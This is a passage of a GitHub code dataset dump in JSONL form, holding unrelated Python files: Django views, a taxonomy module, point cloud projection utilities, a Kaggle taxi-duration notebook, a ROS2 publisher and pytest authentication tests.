r\"C:\\Users\\hmusugu\\Desktop\\Molex\\CogForecasting\\MVA\\Output_test_PA66.xlsx\"\r\ncomm_price_forecasts = pd.DataFrame()\r\ncomm_price_forecasts = pd.concat(out_df_list)\r\n\r\nindex_price_forecasts = pd.DataFrame()\r\nindex_price_forecasts = pd.concat(out_df_list1)\r\n\r\nperf_df = pd.DataFrame()\r\nperf_df = pd.concat(perf_list)\r\n\r\n#Are we using this?\r\n#pred_uni_exog2.to_excel(\"ADAPT_Data_Source_20200817 v9.xlsx\",sheet_name = endog_typ['material'][0])\r\n\r\n\r\nbook = load_workbook(path)\r\nwriter = pd.ExcelWriter(path, engine = 'openpyxl')\r\nwriter.book = book\r\n\r\ncomm_price_forecasts.to_excel(writer, sheet_name = 'commodity_forecast_data')\r\nindex_price_forecasts.to_excel(writer, sheet_name = 'index_forecast_data')\r\nperf_df.to_excel(writer, sheet_name = 'perf_metrics')\r\nfs.to_excel(writer, sheet_name = 'Feature Selection')\r\nwriter.save()\r\nwriter.close()\r\n \r\n\r\n\r\n","repo_name":"hmusugu/Projects","sub_path":"Python Scripts/ResinPriceForecasting_v3.py","file_name":"ResinPriceForecasting_v3.py","file_ext":"py","file_size_in_byte":24309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20542159032","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom .models import Product, Category, Company\n# Create your views here.\n\ndef crud(request):\n\n products = Product.objects.all()\n categories = Category.objects.all()\n companies = Company.objects.all()\n params = {'products': products, 'categories' : categories, 'companies' : companies}\n\n\n return render(request, 'shop/index.html', params)\n\ndef showcategory(request, cat):\n\n categories = Category.objects.all()\n companies = Company.objects.all()\n\n cats = Category.objects.get(name=cat)\n\n products = Product.objects.filter(category=cats).values()\n\n params = {'products' : products, 'category' : cat, 'categories' : categories, 'companies' : companies}\n\n return render(request, 'shop/category.html', params)\n\n\ndef showcompany(request, comp):\n\n categories = Category.objects.all()\n companies = Company.objects.all()\n\n comps = Company.objects.get(name=comp)\n\n products = Product.objects.filter(company=comps).values()\n\n params = {'products' : products, 'category' : comp, 'categories' : categories, 'companies' : companies}\n\n return render(request, 'shop/category.html', params)\n\n\ndef showproduct(request,product_id):\n \n product=Product.objects.get(id=product_id)\n related=Product.objects.exclude(id=product_id).values\n \n params={'product':product,'related':related }\n\n return render(request,'shop/product.html',params)\n\n\n\n\n","repo_name":"deepakcoder2218/deepak_django2","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74051548285","text":"from robertslab.ncbi import db\n\nclass TaxonomyNode:\n def __init__(self, taxid, name, rank):\n self.taxid=taxid\n self.name=name\n self.rank=rank\n self.parent=None\n self.children=[]\n self.leafCount=1\n \n def __str__(self, level=0):\n s=\"\"\n for i in range(0,level):\n s+=\" \"\n ret=s+\"%s (%d)\\n\"%(self.name,self.leafCount)\n for child in self.children:\n ret+=child.__str__(level+1)\n return ret #or results[3] == 131567\n\n def getLeaves(self):\n ret=[]\n if len(self.children) == 0:\n ret.append(self)\n else:\n for child in self.children:\n ret.extend(child.getLeaves())\n return ret\n \n def 
getAncestory(self):\n if parent == None:\n return [self]\n else:\n ret=parent.getAncestory()\n ret.append(self)\n return ret\n\ndef getTaxidFromGi(gi):\n cursor = db.cursor()\n cursor.execute(\"SELECT taxid FROM tax_gi_to_taxid WHERE gi=%s\",gi)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n return results[0]\n else:\n return None\n \ndef getName(taxid):\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM tax_nodes NATURAL JOIN tax_names WHERE tax_nodes.taxid=%s AND tax_names.class='scientific name'\",taxid)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n return results[0]\n else:\n return None\n\ndef getLineage(taxid, showHidden=True):\n cursor = db.cursor()\n rootNode=None\n while True:\n cursor.execute(\"SELECT taxid,rank,name,parent_taxid,hidden_node FROM tax_nodes NATURAL JOIN tax_names WHERE tax_nodes.taxid=%s AND tax_names.class='scientific name';\",taxid)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n \n # Add the node to the lineage.\n if showHidden or results[4] == 0:\n newRootNode=TaxonomyNode(results[0],results[2],results[1])\n if rootNode != None:\n newRootNode.children.append(rootNode)\n rootNode.parent=newRootNode\n rootNode=newRootNode\n \n # If the parent is the same as the node, we are done.\n if results[0] == results[3]:\n break\n \n # Set the new node to be the parent and loop again.\n taxid=results[3]\n \n elif cursor.rowcount == 0:\n raise Exception('Unknown taxid',taxid)\n else:\n raise Exception('Invalid taxid',taxid)\n \n return rootNode\n \ndef mergeTrees(taxonomyTrees):\n \n root=taxonomyTrees[0]\n for treeIndex in range(1,len(taxonomyTrees)):\n tree=taxonomyTrees[treeIndex]\n \n # Make sure the trees have the same root.\n if tree.taxid != root.taxid:\n raise Exception('Taxonomy trees to merge must have the same root')\n \n root.leafCount += tree.leafCount\n \n # Go through each child in the tree.\n for child in tree.children:\n \n # Go through each child in the root.\n added=False\n for i in range(0,len(root.children)):\n rootChild=root.children[i]\n \n # If the child is an exact match, merge it with the root's child.\n if child.taxid == rootChild.taxid:\n mergeTrees([rootChild,child])\n added=True\n break\n \n # If the child is lexicographically less than the root child, this must be the place to insert it. 
\n elif child.name < rootChild.name:\n root.children.insert(i,child)\n child.parent=root;\n added=True\n break\n\n # If we didn't add it, put it add the end.\n if not added:\n root.children.append(child)\n \n return root\n","repo_name":"chloe-lqr/biospark","sub_path":"源文件/源代码/Code/Python/robertslab/ncbi/taxonomy.py","file_name":"taxonomy.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"34981105342","text":"\n\n\n# import gi\n# gi.require_version(\"Gtk\", \"3.0\")\n# from gi.repository import Gtk\nfrom computer_v1 import compute\n\n# class App(Gtk.Window):\n\n# def __init__(self):\n# Gtk.Window.__init__(self, title=\"Computer v1\")\n# self.set_default_size(200, 100)\n# self.set_border_width(10)\n# table = Gtk.Grid()\n# table.set_row_spacing(30)\n# self.add(table)\n\n# entry = Gtk.Entry()\n# entry.set_text(\"Entrez votre polynône ici et validez avec \\\"Entrée\\\"\")\n \n# label = Gtk.Label(\"\")\n# entry.connect(\"activate\", self.cb_activate, label)\n\n# table.attach(entry, 0, 0, 10, 2)\n# table.attach(label, 0, 1, 10, 10)\n\n\n\n# def cb_activate(self, entry, label):\n# equation = entry.get_text()\n# result = compute(equation)\n# label.set_text(result)\n\n# return\n\n\n# win = App()\n# win.connect(\"destroy\", Gtk.main_quit)\n# win.show_all()\n# Gtk.main()\n\n\n\n#########################################################################################################################\n\nfrom tkinter import Tk, StringVar, Label, Entry, Button\nfrom functools import partial\nfrom computer_v1 import compute\n\ndef update_label(label, stringvar, action):\n if action == 'valider':\n equation = stringvar.get()\n res = compute(equation)\n print(res)\n label.config(text=res)\n stringvar.set('')\n elif action == 'effacer':\n label.config(text='')\n stringvar.set('')\n\n\nroot = Tk()\ntext = StringVar(root)\nlabel = Label(root, text='')\nentry_name = Entry(root, textvariable=text)\nbutton = Button(root, text='Valider', command=partial(update_label, label, text, 'valider'))\nclear_button = Button(root, text='Effacer', command=partial(update_label, label, text, 'effacer'))\n\nlabel.grid(column=0, row=0)\nentry_name.grid(column=0, row=1)\nbutton.grid(column=0, row=2)\nclear_button.grid(column=0, row=3)\n\nroot.mainloop()","repo_name":"mmartins1502/computer_v1","sub_path":"tk.py","file_name":"tk.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"33934980391","text":"from scipy.spatial.transform import Rotation\nimport numpy as np\nimport open3d as o3d\nimport struct\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n\ndef label_to_color(semantic_map,palette):\n \"\"\"\n @brief Converting semantic label map into rgb cityscapes color palatte with respect to label ids\n @param semantic_map (n*m)\n @param palette By default it is cityscapes palette\n @return colored semantic_map (n*m*3)\n \"\"\"\n\n color_seg = np.zeros((semantic_map.shape[0], semantic_map.shape[1], 3), dtype=np.uint8)\n for label, color in enumerate(palette):\n color_seg[semantic_map == label] = color\n \n \n #Converting BGR to RGB\n color_seg = color_seg[..., ::-1]\n color_seg = color_seg.astype(np.uint8)\n return color_seg\n\n\n\n\ndef semantics_to_colors(semantics:np.array,palette:np.array) -> np.array:\n \"\"\"\n @brief Converting semantic map into rgb cityscapes color palatte with respect to label names\n @param 
semantics [npoints, 1]\n @return Colors [npoints, 3]\n \"\"\"\n \n \n colors = np.ones((semantics.shape[0], 3))\n \n for label,color in enumerate(palette):\n \n \n colors[semantics == label] = (color[0]/255,color[1]/255,color[2]/255)\n \n \n return colors\n\n\n\ndef visuallize_pointcloud(pointcloud: np.array,path:str,filename:str,palette:np.array) -> None:\n \"\"\"\n @brief Visualizing colored point cloud\n @param pointcloud in lidar coordinate [npoints, 4] in format of [X Y Z label_ids]\n @return None\n \"\"\"\n \n #Get RGB values from pointcloud\n semantics = pointcloud[:, 3]\n #Get xyz values from pointcloud\n xyz = pointcloud[:, 0:3]\n\n\n #Initialize Open3D visualizer\n visualizer = o3d.visualization.Visualizer()\n pcd = o3d.geometry.PointCloud()\n visualizer.add_geometry(pcd)\n\n\n # Get colors of each point according to cityscapes labels\n colors = semantics_to_colors(semantics,palette)\n \n pcd.points = o3d.utility.Vector3dVector(xyz)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n # o3d.visualization.draw_geometries([pcd])\n o3d.io.write_point_cloud(os.path.join(path,\"results\",\"painted_cloud\",filename+\".pcd\"),pcd)\n \n\n\ndef transform_velo_to_cam(R0, Tr_cam_to_lidar):\n \"\"\"\n @brief Implementation for getting Trasformation matrix from lidar to camera\n @param R0: rectification rotation matrix\n @param Tr_cam_to_lidar: Transformation matrix from camera to lidar [3,4]\n @return Trasformation matrix from lidar to camera[3,4]\n \"\"\"\n R_ref2rect = np.eye(4)\n R0_rect = R0.reshape(3, 3) # ref_cam2rect\n R_ref2rect[:3, :3] = R0_rect\n R_ref2rect_inv = np.linalg.inv(R_ref2rect) # rect2ref_cam\n\n # inverse rigid transformation\n cam2velo_ref = np.vstack((Tr_cam_to_lidar.reshape(3, 4), np.array([0., 0., 0., 1.]))) \n P_cam2velo_ref = np.linalg.inv(cam2velo_ref)\n\n proj_mat = P_cam2velo_ref @ R_ref2rect_inv\n return proj_mat\n\ndef projection_velo_to_cam(R0, Tr_lidar_to_cam,P):\n \"\"\"\n @brief Projection matrix for projection of lidar to camera\n @param R0: Rectified Rotation Matrix\n @param Tr_lidar_to_cam: Transformation matrix for lidar to camera\n @param P: Perspective Intrinsics [3,4]\n @return Projection matrix[3,4]\n \"\"\"\n\n R_rect = np.eye(4)\n R0 = R0.reshape(3, 3)\n R_rect[:3, :3] = R0\n P_ = P.reshape((3, 4))\n proj_mat = P_ @ R_rect @ Tr_lidar_to_cam\n return proj_mat\n\n\n\n\n\ndef convert_3D_to_2D(P,lidar_pts):\n \"\"\"\n @brief Projecting 3D points on the image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @return points on image(2D points)[npoints,2] and projected depth [npoints,1]\n \"\"\"\n \n \n\n pts_3d = convert_3d_to_hom(lidar_pts)\n pts_2d= np.dot(pts_3d,P.T)\n \n depth = pts_2d[:, 2]\n depth[depth==0] = -1e-6\n\n pts_2d[:, 0] /= pts_2d[:, 2]\n pts_2d[:, 1] /= pts_2d[:, 2]\n \n pts_2d = pts_2d[:, :2]\n\n return pts_2d,depth\n\n\ndef remove_lidar_points_beyond_img(P,lidar_pts, xmin, ymin, xmax, ymax):\n \"\"\"\n @brief Filter lidar points, keep only those which lie inside image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @param xmin minimum image size width\n @param ymin minimum image size height\n @param xmax maximum image size width\n @param ymax maximum image size height\n @return points on image(2D points)[npoints,2], list of indices, projected depth [npoints,1]\n \"\"\"\n pts_2d,depth = convert_3D_to_2D(P,lidar_pts)\n \n inside_pts_indices = ((pts_2d[:, 0] >= xmin) & (pts_2d[:, 0] < xmax) & (pts_2d[:, 1] >= ymin) & (pts_2d[:, 1] < ymax))\n\n \n \n return pts_2d, 
inside_pts_indices,depth\n\n\ndef project_lidar_on_image(P, lidar_pts, size):\n \"\"\"\n @brief Projecting 3D lidar points on the image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @param size: image size\n @return filtered points on image(2D points)[npoints,2] and projected depth [npoints,1]\n \"\"\"\n all_pts_2d, fov_inds, depth = remove_lidar_points_beyond_img(P,lidar_pts, 0, 0,size[0], size[1])\n\n return all_pts_2d[fov_inds],depth[fov_inds], lidar_pts[fov_inds]\n\ndef convert_3d_to_hom(pts_3d):\n \"\"\"\n @brief Converting lidar points into homogenous coordinate\n @param pts_3d [npoints,3]\n @return pts_3d into homogenous coordinate [npoints,4]\n \"\"\"\n \n n = pts_3d.shape[0]\n pts_3d_hom = np.hstack((pts_3d, np.ones((n, 1))))\n return pts_3d_hom\n","repo_name":"venk221/Point-Cloud_Semantic-Segmentation-Point-Painting","sub_path":"Code/pcd_folder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"74947607167","text":"import pandas as pd\n\nimport seaborn as sns\n\nimport pathlib as Path\n\nimport matplotlib.pyplot as plt\n\nimport sklearn\n\nimport numpy as np\n\n\n\n\n\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.model_selection import ShuffleSplit\n\nfrom sklearn.model_selection import cross_val_score\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\ndf = pd.read_csv('../input/train.csv')\n\ntst = pd.read_csv('../input/test.csv')\n\ndf.info()\ndf.head()\ndf['pickup_datetime'] = pd.to_datetime(df['pickup_datetime'])\n\ndf['year'] = df['pickup_datetime'].dt.year\n\ndf['month'] = df['pickup_datetime'].dt.month\n\ndf['day'] = df['pickup_datetime'].dt.day\n\ndf['weekday'] = df['pickup_datetime'].dt.weekday\n\ndf['hour'] = df['pickup_datetime'].dt.hour\ndf = df[df['trip_duration']<= 50000]\n\ndf = df[df['passenger_count']>= 1]\ndf.describe()\nselected_columns = ['passenger_count',\n\n 'pickup_latitude',\n\n 'pickup_longitude',\n\n 'dropoff_latitude',\n\n 'dropoff_longitude',\n\n 'year', 'month', \n\n 'day', 'hour',\n\n 'weekday'\n\n ]\ntst['pickup_datetime'] = pd.to_datetime(tst['pickup_datetime'])\n\ntst['year'] = tst['pickup_datetime'].dt.year\n\ntst['month'] = tst['pickup_datetime'].dt.month\n\ntst['day'] = tst['pickup_datetime'].dt.day\n\ntst['weekday'] = tst['pickup_datetime'].dt.weekday\n\ntst['hour'] = tst['pickup_datetime'].dt.hour\ntst.describe()\nX = df[selected_columns]\n\ny = df['trip_duration']\nX.shape, y.shape\nrf = RandomForestRegressor()\n\ncv = ShuffleSplit(n_splits=5, test_size=0.2, train_size=0.1, random_state=200)\n\nlosses = -cross_val_score(rf, X_train, y_train, cv=cv, scoring='neg_mean_squared_log_error')\n\nlosses = [np.sqrt(l) for l in losses]\n\nlosses\nrf.fit(X, y)\ntst = pd.read_csv('../input/test.csv')\n\ntst['pickup_datetime'] = pd.to_datetime(df_test['pickup_datetime'])\n\ntst.head()\nX_test = tst[selected_columns]\ny_pred = rf.predict(X_test)\n\ny_pred.mean()\nsubmission = pd.read_csv(\"../input/sample_submission.csv\")\n\nsubmission.head()\nsubmission.to_csv(\"submission.csv\", index=False)\npd.read_csv(\"submission.csv\")","repo_name":"aorursy/new-nb-2","sub_path":"cyrildev95_cyrilsantos-examtaxi.py","file_name":"cyrildev95_cyrilsantos-examtaxi.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"1702286733","text":"# import threading\r\nimport 
time\r\nimport curses\r\n\r\nfrom direct_control_shore.UserInterface import UserInterface\r\nfrom shared.JetsonNanoPins import JetsonNanoPins\r\n\r\n\r\ndef handle_user_input_error_mode(screen_view, commands_model_lock):\r\n\ttry:\r\n\t\thandle_user_input(screen_view, commands_model_lock)\r\n\texcept Exception as e:\r\n\t\tglobal error_message_set\r\n\t\terror_message_set.add(\"Error caught\" + str(e))\r\n\r\n\r\ndef handle_user_input(screen_view, commands_model_lock):\r\n\r\n\t# ROS2\r\n\tPublisher = DirectControlPublisher()\r\n\r\n\t# to make sure the shore and nano are synched upon start of direct control \r\n\tROS2_msg = f\"time interval set: {screen_view.time_interval_ms}\"\r\n\tPublisher.single_call(ROS2_msg)\r\n\r\n\tvalid_keys_set = set()\r\n\r\n\twhile True:\r\n\t\t# Get a key\r\n\t\tkey = screen_view.stdscr.getch()\r\n\r\n\t\tcommands_model_lock.acquire()\r\n\r\n\t\t#for the purposes of debuging\r\n\t\tif key == ord(\"F\"):\r\n\t\t\tscreen_view.DEBUG()\r\n\r\n\t\t# Exit if ESC is pressed\r\n\t\telif key == 27:\r\n\t\t\tcurses.nocbreak()\r\n\t\t\tscreen_view.stdscr.keypad(False)\r\n\t\t\tcurses.echo()\r\n\t\t\tcurses.endwin()\r\n\t\t\tbreak\r\n\r\n\t\t# for processing the commands from the file\r\n\t\telif key == ord(\"!\"):\r\n\t\t\t#attempt to build the dictionaries and render the screen, else render the most detailed error possible\r\n\t\t\tif screen_view.generate_dictionaries_from_json():\r\n\t\t\t\tscreen_view.generate_command_screen()\r\n\t\t\t\t# screen_view.DEBUG()\r\n\t\t\t\tscreen_view.render_time_interval_change(0)\r\n\t\t\t\t# screen_view.DEBUG()\r\n\t\t\t\tvalid_keys_set = screen_view.command_keys.keys()\r\n\r\n\t\telif (key == ord(\"+\") or key == ord(\"=\")):\r\n\t\t\t\r\n\t\t\tscreen_view.render_time_interval_change(25)\r\n\t\t\t\r\n\t\t\t# ROS2\r\n\t\t\tROS2_msg = f\"TIME INTERVAL SET: {screen_view.time_interval_ms}\"\r\n\t\t\tPublisher.single_call(ROS2_msg)\r\n\r\n\r\n\t\telif (key == ord(\"-\") or key == ord(\"_\")):\r\n\t\t\tscreen_view.render_time_interval_change(-25)\r\n\r\n\t\t\t# ROS2\r\n\t\t\tROS2_msg = f\"TIME INTERVAL SET: {screen_view.time_interval_ms}\"\r\n\t\t\tPublisher.single_call(ROS2_msg)\t\r\n\r\n\t\telif str(chr(key)) in valid_keys_set:\r\n\t\t\tif screen_view.handle_key_hit(str(chr(key))):\r\n\t\t\t\tcommand_name = screen_view.command_keys[str(chr(key))]\r\n\r\n\t\t\t\t# ROS 2 stuff\r\n\t\t\t\tROS2_msg = f\"PINS: {screen_view.command_pins[command_name]}\"\r\n\t\t\t\tPublisher.single_call(ROS2_msg)\r\n\t\t\t\tpass\r\n\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\t\t\t\t\r\n\r\n\r\n\t\t\t\r\n\r\n\t\tcommands_model_lock.release()\r\n\r\n\r\n\r\n#TODO move to another file\r\nimport rclpy\r\nfrom rclpy.node import Node\r\n\r\nfrom std_msgs.msg import String \r\n\r\nclass DirectControlPublisher(Node):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__('Direct_Contol_Shore')\r\n\t\tself.publisher_ = self.create_publisher(String, 'Direct_Contol_Topic', 10)\r\n\r\n\tdef single_call(self, incoming_msg):\r\n\t\tmsg = String()\r\n\t\tmsg.data = incoming_msg #'Hello World: %d' % self.i\r\n\t\tself.publisher_.publish(msg)\r\n\t\t# self.get_logger().info('Publishing: \"%s\"' % msg.data)\r\n\t\t# self.i += 1","repo_name":"BeckerWasHere/LPLDLS-ME491-23","sub_path":"ros2_ws_LPLDLS/direct_control_shore/handle_user_input.py","file_name":"handle_user_input.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"16645882334","text":"from django.shortcuts import render\n\n# Create 
your views here.\nfrom rest_framework.generics import CreateAPIView, ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import *\nfrom . import ser\nfrom Account.models import Account\n\nfrom django.http import HttpResponse,JsonResponse\n\n\nclass UserLogin(APIView):\n '用户登录视图类'\n authentication_classes = []\n # 登录不需要认证\n\n def post(self, request):\n username = request.POST.get('username').strip()\n pwd = request.POST.get('password').strip()\n if not all([username, pwd]):\n return Response({'msg': '参数不完整', 'code': 400})\n user = UserProfile.objects.filter(username=username).first()\n try:\n user.check_pwd(pwd)\n # 登录成功后生成token\n res = {'msg': 'success', 'code': 200}\n CalcTotalBalance(user)\n res['data'] = ser.UserInfoSer(user).data\n print(res)\n except:\n res = {'msg': '用户名或密码错误', 'code': 404}\n print(res)\n return Response(res)\n\n\nclass UserRegister(CreateAPIView):\n \"\"\"用户注册视图\"\"\"\n authentication_classes = []\n # 用户注册不需要认证\n serializer_class = ser.CreateUserSer\n\n\nclass UserInfoList(ListAPIView):\n \"\"\"用户详情页视图\"\"\"\n serializer_class = ser.UserInfoSer\n queryset = UserProfile.objects.all()\n\n\ndef CalcTotalBalance(userGet):\n allAccounts = Account.objects.filter(user=userGet)\n total_balance: float = 0.0\n for one in allAccounts:\n if one.consumption_or_earn:\n total_balance += one.sum_value\n else:\n total_balance -= one.sum_value\n userGet.total_balance = total_balance\n userGet.save()\n return total_balance\n\n\ndef FetchTotalBalance(request):\n user_id = request.POST.get('user_id')\n userGet = UserProfile.objects.filter(id=user_id).first()\n total_balance = CalcTotalBalance(userGet)\n res = {'total_balance': total_balance}\n return JsonResponse(res,safe=False)\n\n# def getFilterAccount(request):\n# user_id = request.GET.get('user_id')\n# allInfo = requests.get(\"http://localhost:8000/account/\")\n# jsonAll = allInfo.text.strip()\n# print(jsonAll)\n# newList = []\n# for oneInfo in jsonAll:\n \n# print(oneInfo)\n# if oneInfo['user'] == int(user_id):\n# newList.append(oneInfo)\n# print(newList)\n\ndef pushImage(request):\n url = 'http://127.0.0.1:8089/api/tr-run/' # 上传文件接口\n\n # files = {\n\n # 'file': ('tst.png', # 文件名称\n\n # open('tst.png', 'rb'), # 文件路径\n\n # 'image/png', # 文件类型\n\n # {'Expires': '0'} # 其他参数,非必传\n\n # )\n\n # } # => 打开上传文件并且加入文件相关参数\n\n\n\n # data = {\n\n # \"name\": \"tst\"\n\n # }\n print(request.FILES)\n file = request.FILES.get(\"file\",None)\n params = {'file':file}\n\n print(params)\n # data传入请求参数dict,files传入待上传文件参数dict\n import requests,json\n response = requests.post(url, files=params)\n resNew = json.loads(response.text)\n resList = resNew['data']['raw_out']\n with open(\"dataSet.txt\",'w') as f:\n # for one in resList:\n # print(one)\n # f.write(one)\n # f.write('\\n')\n # print(resList[0])\n # for one in resList[0]:\n # print(one)\n for res in resList:\n f.write(res[1] +'\\n')\n f.close()\n import re,json,requests\n lines = []\n with open('dataSet.txt', 'r') as file:\n lines = file.readlines()\n file.close()\n date = []\n money = []\n time = []\n cost = []\n nums = []\n types = []\n moneyStr = \"\\-?\\d+\\.\\d+\"\n dateStr = \"\\d{4}-\\d{2}-\\d{2}\"\n typeStr = \"^卡账户.*$\"\n timeStr = \"\\d{2}:\\d{2}:\\d{2}\"\n flag = False\n for i in range(len(lines)):\n res = re.search(dateStr, lines[i])\n if res != None:\n date.append(res[0])\n nums.append(i)\n\n for j in range(len(nums) - 1):\n for k in range(nums[j], nums[j+1]):\n resMoney = re.search(moneyStr, lines[k])\n resTime = 
re.search(timeStr, lines[k])\n resType = re.search(typeStr,lines[k])\n if resMoney != None:\n money.append(resMoney[0])\n if resTime != None:\n time.append(resTime[0])\n if resType != None:\n types.append(resType[0])\n for l in range(nums[-1], len(lines)):\n resMoney = re.search(moneyStr, lines[l])\n resTime = re.search(timeStr, lines[l])\n resType = re.search(typeStr, lines[l])\n if resMoney != None:\n money.append(resMoney[0])\n if resTime != None:\n time.append(resTime[0])\n if resType != None:\n types.append(resType[0])\n\n for i in range(0, len(money), 2):\n cost.append(money[i])\n\n # print(date,len(date))\n # print(money ,len(money))\n # print(time ,len(time))\n # print(cost,len(cost))\n # print(nums,len(nums))\n minNum = min(len(nums),len(date),len(types),len(time),len(cost))\n for i in range(minNum):\n params = {\"sum_value\":str(abs(float(cost[i]))),\n \"date_value\":date[i],\n \"time_value\":time[i],\n \"remarks_value\":types[i],\n \"account_type\":\"餐饮伙食\",\n \"billTypeNumber\":\"cyhs\",\n \"consumption_or_earn\": 0,\n \"user\":1\n }\n # params = json.dumps(params)\n # print(params)\n aaa = requests.post(\"http://localhost:8000/account/\",data = params)\n return JsonResponse(\"{ok:ok}\")","repo_name":"JohenanLi/ocrProject","sub_path":"backEnd/Users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27025903812","text":"import json\n\nimport pytest\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom lavocat.api.v1.core.facade import UserNotAllowed, Unauthorized\n\n\n@pytest.fixture\ndef post_authenticate_mock(client, google_auth_mock, google_token):\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_should_call_action(post_authenticate_mock, google_auth_mock, google_token):\n google_auth_mock.assert_called_once_with(google_token)\n\n\n@pytest.fixture\ndef post_authenticate_not_allowed(client, google_auth_mock, google_token):\n google_auth_mock.side_effect = UserNotAllowed\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_not_allowed(post_authenticate_not_allowed):\n assert post_authenticate_not_allowed.status_code == status.HTTP_401_UNAUTHORIZED\n\n\n@pytest.fixture\ndef post_authenticate_unauthorized(client, google_auth_mock, google_token):\n google_auth_mock.side_effect = Unauthorized\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_unauthorized(post_authenticate_unauthorized):\n assert post_authenticate_unauthorized.status_code == status.HTTP_401_UNAUTHORIZED\n\n\n@pytest.fixture\ndef response_content_authorized(token_data, user_email):\n return {\n 'useremail': user_email,\n 'access_token': token_data['access_token'],\n 'refresh_token': token_data['refresh_token'],\n }\n\n\n@pytest.fixture\ndef post_authenticate_authorized(\n client, google_auth_mock, response_content_authorized, google_token\n):\n google_auth_mock.return_value = response_content_authorized\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_authorized(post_authenticate_authorized, response_content_authorized):\n assert 
post_authenticate_authorized.status_code == status.HTTP_200_OK\n assert post_authenticate_authorized.json() == response_content_authorized\n","repo_name":"sleonardoaugusto/lavocat_backend","sub_path":"lavocat/api/v1/core/tests/test_view_google_auth.py","file_name":"test_view_google_auth.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17482544965","text":"from absl import flags\n\nfrom src.util.file_io import load_png, load_spritesheet_json\nfrom src.util.image import upscale_surface\nfrom src.util.types import SpritesheetDict\n\nFLAGS = flags.FLAGS\n\n\ndef get_assets() -> dict:\n asset = {}\n parsed_pngs = []\n\n for file_type in FLAGS.game.path:\n if file_type == \"json\":\n for file in FLAGS.game.path[file_type]:\n surface = load_png(filepath=FLAGS.game.path.png[file])\n frames, tags = load_spritesheet_json(\n filepath=FLAGS.game.path[file_type][file]\n )\n asset[file] = SpritesheetDict(image=surface, frames=frames, tags=tags)\n parsed_pngs.append(file)\n\n elif file_type == \"png\":\n for file in FLAGS.game.path[file_type]:\n if file in parsed_pngs:\n continue\n\n surface = load_png(filepath=FLAGS.game.path.png[file])\n scaled_surface = upscale_surface(surface=surface)\n asset[file] = scaled_surface\n\n return asset\n","repo_name":"castilloglenn/slime-smashers","sub_path":"src/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"568809626","text":"#----------------------------------------------------\r\n# Dateiname: assert_iterable.py \r\n# Beispiel für assert-Anweisung zum Testen von Vorbedingungen\r\n#\r\n# Python 3 mitp Verlag\r\n# Kap. 
21\r\n# Michael Weigend 7.6.2019\r\n#----------------------------------------------------\r\n\r\n\r\ndef diversität(s):\r\n # liefert die Anzahl unterschiedlicher Elemente einer Kollektion\r\n assert hasattr(s, '__iter__')\r\n assert len(s) > 0\r\n menge = set(s)\r\n return len(menge)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(diversität('Barbara'))\r\n print(diversität(110))\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"mweigend/python3","sub_path":"Kapitel 21/assert_iterable.py","file_name":"assert_iterable.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"30598218400","text":"\n\ndef add_to_clock(hour, min, sec, diff):\n sign = 1 if diff >= 0 else -1\n\n hour += (abs(diff)//3600)*sign\n diff = (abs(diff) % 3600)*sign\n min += (abs(diff) // 60)*sign\n diff = (abs(diff) % 60)*sign\n sec += diff\n\n if sign > 0:\n min += sec // 60\n sec %= 60\n\n hour += min // 60\n min %= 60\n\n hour %= 24\n\n if sec < 